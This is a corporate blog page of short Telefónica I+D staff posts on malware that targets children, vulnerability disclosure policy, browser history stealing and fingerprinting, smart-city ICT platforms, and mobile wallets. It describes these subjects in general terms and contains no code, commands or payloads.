The blog of Telefónica I+D
employees

Author: Carlos Plaza

A security system is determined by the weakest link, which is usually the user- some of the most popular hackers use social engineering as a primary tool to get access to business systems-.

It is in that weakest link where we find a more vulnerable group: kids.

In September, a security software manufacturer, BitDefender carried out an information campaign-obviously with a commercial interest to promote their products-, concerning this issue: nowadays children are growing up with Internet, but as kids, they are less aware of avoiding software vulnerabilities.

As a result, kids are bound to become hackers’ target in order to install the malware, either  through infected websites or sending spam emails to children- hoping that their parents will use the same software for  their banking transactions (-: -

The following are some examples used to install malicious software:

-          Kids look for paintbrush of their favorite cartoons to paint them on line or print and colored them; hackers use this trick to install malware.

-          “Spot the difference” interactive games.

-          Virtual pets, kids are asked to download an application to paint their pets ,feed them…etc.

What would be the solution to this? Well, if it is a hard task to educate grownups, imagine kids… technically it is recommended using a good antimalware or creating separate accounts by taking away some privileges to kids.  Thus, the infection causes little damage.

Author: David Barroso

The eternal discussion between full-disclosure vs responsible-disclosure has a relatively brand-new area: the critical infrastructure protection (CIP). It is quite common, that from time to time it is discussed the best way of reporting a  vulnerability to a manufacturer. A procedure that can satisfy both sides(the one who finds the vulnerability and the manufacturer) has not been institutionalized yet . There is all kind of choices; none of them is more successful though: acknowledging the researcher’s help (i.e. Microsoft), paying a certain amount of money (Google), or simply, using some company which works as a broker in order to pay the vulnerabilities (i.e. (iDefense VCP or Tippingpoint ZDI). But the truth is that these methods don’t work; the better example happened last year when vulnerability was discovered by Tavis Ormandy in Windows. This case proves the needs of having some type of procedure which pleases all sides.

Unfortunately, nowadays some manufacturers don’t think security is essential  to avoid risk to their users ( ZDI’s list about unpatched vulnerabilities is quite illustrative). On the other hand, some researchers also think that manufacturers have to fulfill their requirements immediately, even involving extortions to manufacturers. Although there have always been some attempts of proceduralising the vulnerability’s reporting (from the well-known RFP’s procedure),ranging from an IETF’S attempt , Responsible Vulnerability Disclosure Process which ended up becoming the  Organization for Internet Safety procedure base, to No More Free Bugs initiative promoted by several researchers. If we deal with critical infrastructure protection, recently we witness what happened some years ago, after trying to do things right, realizing that it doesn’t work often, we come across different positions like  Digital Bond’s, whose vulnerability reporting policy is as simple as: we’ll do what we like; because they have had enough seeing how manufacturers , after incidents such as Stuxnet  or the vulnerabilities found by Dillon Beresford, don’t seem to react , not even when ICS-CERT is involved ( the manufacturer can even report you).

By the end of the day what really matters is how each manufacturer is concerned about handling and coordinating these incidents (communication with researchers and companies), because, if we’ve finally realized that none of the global vulnerability reporting policies works, it is the manufacturer’s task to fix its own policy ,what’s more pleasing both sides. For instance, Mozilla, Barracuda, Google, FaceBook or Twitter have already done it. And not all of them pay for vulnerability found, but some of them simply acknowledge the help of it.

In short, prevention is better than cure, and all large firms must be running a clear and published policy about the vulnerabilities that third parties find over their products, services or simply, over their webs, and they must recognize as well the work of people that collaborate positively  in enhancing the network security.

 Author: Carlos Plaza

In the Internet, many features that were designed for doing the “good” are used for doing the “evil” when we talk about security&privacy.

For example, the fact that a http request includes information about screen size, browser version& language, or available fonts ,etc was intended to allow websites to customize the layout or the localization of the content being served.

However, this information is also used to fingerprint  devices in order to track users.

The same way, the feature we are used to of displaying in different colours a visited link and a non-visited link has been used for “history stealing”: for example, a dubious visited website includes a list of links, and with JavaScript it checks the colour of the links to find out whether you have visited one of them.

This way, that site can learn” interesting things” such as the banks you have visited, in order to target a phishing attack

There’re even companies that sell products or services to be used by web developers for history stealing (BeenCounter)  or companies that want to know whether a visitor to its website has previously visited other sites with information about the company (Tealium).

This feature has been exploded for compromising the user privacy in a sophisticated way, as researches at Stanford University have published recently: a deep study of  an online tracking company which checks whether the user has visited any of a list of more than 15.000 links, carefully segmented in categories such as group purchases, home appliances, cars, or even sensitive information such as health or financial issues…

 And which user protection is available?

Browsers such as Firefox has included in its recent versions a fix to protect from history stealing, although there’s never a 100% guarantee that attackers are not going to be able to circumvent the protection (for example, not using JavaScript but background images for visited links)… in fact, it has taken several years of discussion in the Mozilla community to choose a mechanism, since there was not a clear option to eliminate the attack without affecting other functionalities.

So it’s not a bad idea to use some free add-ons -such as Ghostery or other tools that prevent tracking and avoid execution of scripts from blocked trackers- or NoScript to selectively block/allow scripts. And of course, to configure your browser to delete the history as you close it.

Autor: Jose Manuel Hernández

From the information and communication technologies (ICT) point of view, and at a holistic level, cities can be considered as ‘systems of systems’. However, one of the most well-known definitions of a Smart City was already provided some years ago by the EU project ‘European Smart Cities’ [1]. Under this work, six dimensions of ‘smartness’ were identified each one of them somehow related to the ICT world (economy, people, governance, mobility, environment, and living).

As the upsurge ICTs has become the nervous system of all modern economies, making cities smarter is usually achieved through the use of ICT intensive solutions. In fact, ICT is already at the heart of many current models for urban development: revamping their critical infrastructure and enabling new ways of city transport management, traffic control or environmental pollution monitoring. The extensive use of ICT is also empowering the development of essential services for health, security, police and fire departments, governance and delivery of public services. Nevertheless, the main concern with respect to most of these solutions is that its own commercial approach is leading to an unmanageable and unsustainable sea of systems and market islands. From the point of view of the Telcos, that is quite well aligned with the European Commission approach to the PPP, there is a need to reach to a high level agreement at an industrial level to overcome this increasing market fragmentation, which prevents solutions of becoming more efficient, scalable and suitable for supporting new generations of services that are not even envisaged nowadays.

Consequently, the successful development of the Smart Cities paradigm will “require a unified ICT infrastructure to allow a sustainable economic growth” [2], and this unified ICT platform must be suitable to “model, measure, optimize, control, and monitor complex interdependent systems of dense urban life” [3]. Therefore in the design of urban-scale ICT platforms, three main core functionalities can be identified:

•  Urban Communications Abstraction. One of the most urgent demands for sustainable urban ICT developments is to solve the inefficient use (i.e. duplications) of existing or new communication infrastructures. Due to the broad set of heterogeneous urban scenarios, there will be also a pronounced heterogeneity of the underlying communication layers. So far, through communications abstraction, urban-scale ICT platforms will allow unified communications regardless the different network standards and will enable data transfer services agnostic to the underlying connection protocol. Furthermore, a major challenge in future urban spaces will be how to manage the increasing number of heterogeneous and geographically dispersed machines, sensors and actuators intensively deployed everywhere in the city.

•  Unified Urban Information Models. Also related to the huge amount of heterogeneous information generated at urban scale, a unified ICT platform should be built on top of a unified model so that data and information could be shared among different applications and services at global urban levels. This will relay on the articulation of different enriched semantic descriptions, enabling the development of information processing services involving different urban resources and entities of interest. Specific information management policies should also be addressed to ensure the required level of security and privacy of information.

•  Open Urban Services Development. Together with unified communications and information, a key functionality of urban ICT Platforms should be to guarantee interoperability at both the application and service levels. Only through open, easy-to-use, and flexible interfaces the different agents involved (public administrations, enterprises, and citizens) will be able to conceive new innovative solutions to interact with and manage all aspects of urban life in a cost-effective way. This will provide the necessary innovation-enabling capabilities for attracting public and private investments to create products and services which have not yet been envisioned, a crucial aspect for SmartCities to become future engines of a productive and profitable economy. 

Once major challenges of unified urban-scale ICT platforms are identified, it is clear that the future development of Smart Cities will be only achievable in conjunction with a technological leap in the underlying ICT infrastructure. This technological leap can be faced by considering Smart Cities at the forefront of the recent vision of the Future Internet (FI). Although there is no universally accepted definition of the Future Internet, it can be approached as “a socio-technical system comprising Internet-accessible information and services, coupled to the physical environment and human behavior, and supporting smart applications of societal importance” [4]. Thus the FI can transform a Smart City into an open innovation platform supporting vertical domain of business applications built upon horizontal enabling technologies. The most relevant basic FI pillars [8] for a Smart City environment are the following:

•  The Internet of Things (IoT): defined as a global network infrastructure based on standard and interoperable communication protocols where physical and virtual “things” are seamlessly integrated into the information network [5].

•  The Internet of Services (IoS): flexible, open and standardized enablers that facilitate the harmonization of various applications into interoperable services as well as the use of semantics for the understanding, combination and processing of data and information from different service provides, sources and formats.

•  The Internet of People (IoP): envisaged as people becoming part of ubiquitous intelligent networks having the potential to seamlessly connect, interact and exchange information about themselves and their social context and environment.

At this point, it is important to highlight a bidirectional relationship between the FI and Smart Cities: as if, in the one direction, FI can offer solutions to many challenges that Smart Cities face; on the other direction, Smart Cities can provide an excellent experimental environment for the development, experimentation and testing of common FI service enablers required to achieve ‘smartness’ in a variety of application domains [6]. To this later extent, close to the IoP vision, the Living Labs network [7] based on the user-driven approach is of main relevance.

1. Smart Cities, Ranking of European medium-sized cities,
http://www.smart-cities.eu/
2. The ICT behind cities of the future, http://www.nokiasiemensnetworks.com/
news-events/publications/unite-magazine-february-2010/the-ictbehind-
cities-of-the-future
3. Simonov, M.: Future Internet applications relevant for smart cities, an ICT application area
example: smart & proactive energy management, Open Innovation by FI-enabled services,
Brussels, 15 January (2010)
4. Position Paper: Research Challenges for the Core Platform for the Future Internet. In: M.
Boniface, M. Surridge, C.U (Eds.) http://ec.europa.eu/information_society/
activities/foi/library/docs/fippp-research-challenges-for-coreplatform-
issue-1-1.pdf
5. Sundmaeker, H., Guillemin, P., Friess, P., Woelfflé, S. (eds.): Vision and Challenges for
Realising the Internet of Things, CERP-IoT, March 2010. European Commission, Brussels
(2010)
6. Future Internet Assembly 2009, Stockholm, Sweden (November 2009), http://ec.
europa.eu/information_society/activities/foi/library/docs/fi-stockholm-
report-v2.pdf
7. The European Network of Living Labs, http://www.openlivinglabs.eu/
8. Towards a Future Internet Public Private Partnership, Usage Areas Workshop, Brussels,
3 March (2010), http://ec.europa.eu/information_society/activities/foi/
events/fippp3/fi-ppp-workshop-report-final.pdf

Before answering this question it is important to know what we mean when we talk about “mobile wallet” (mWallet). To do this, just imagine the fusion of our wallet with our mobile phone, so that it would contain – virtually- (eMoney) electronic money, credit cards, point cards, transportation vouchers, discount coupons, etc.

If we analyze the characteristics of the services and pilots that have emerged in different places of the planet over the past few years we can clearly distinguish two types of mobile wallet: purse and credit card holder.

The electronic wallet allows to have a means of payment collection associated with the mobile phone number. These services have expanded with success in certain countries with emerging economies such as the Philippines — these are the cases of G-Cash and SmartMoney-, South Africa– MTN Mobile Money and Wizzit –, Kenya- with the successful M-PESA –, or Paraguay – Tigo Cash, that it has already spread to other Latin American countries.

The above examples share several characteristics in common, the most important, that they cover the same set of requirements for a large segment of the population that has no access to traditional banking products. Among these needs we can highlight the money transfer, both at the national level – for example, by transferring money to a child who has moved to study – and international – transfers made by emigrants to their homes-, the payment of electric or water bills, the payment of wages, and even the receipt of social funds sent by the Government. In regions where there is a low penetration of bank offices, each of the previous operations required long journeys – even for some days – and those are costs that many people cannot afford. Thanks to electronic wallet services these money transfers can be performed quickly, easily and economically, without having to travel beyond the corner store and with sufficiently low operation prices.

However in “banked” regions, in which the vast majority of the population is used to have bank accounts or credit cards, another type of needs is required, such as to have a suitable payment method for small purchases – for example,  to pay the parking meter or a drink in a vending machine-, to make payments in shops in a more secure and flexible way – for example, against one of our credit cards, bank account or even our telephone bill -, or automatically using our point cards and discount vouchers – accumulating points and applying discounts.

In these cases it seeks to run the mobile phone as an electronic credit card holder that will be easy to use, and equally or more secure than current means of payment. In this way, the SIM in the phone – safe and secure environment in which you can store sensitive data such as a credit card – and NFC wireless communication technology are being the maximum players in most pilots that are being deployed in Europe. In particular Telefónica, along with La Caixa and VISA, has developed a Sitges NFC payments pilot during 6 months, in which participated more than 1500 Movistar customers who made payments with mobile phones Samsung S5230 in more than 500 shops.

The same solution, the use of the mobile phone as electronic wallet, to cover needs which are very different. In view of the large number of services and pilots that are being deployed with varying degree of success, the answer to our initial question seems clear: “mobile wallet” is necessary both in emerging economies, with the aim “to bank people who are not”, as in most developed economies, using new wireless communication technologies to create a new experience of payment via mobile phone.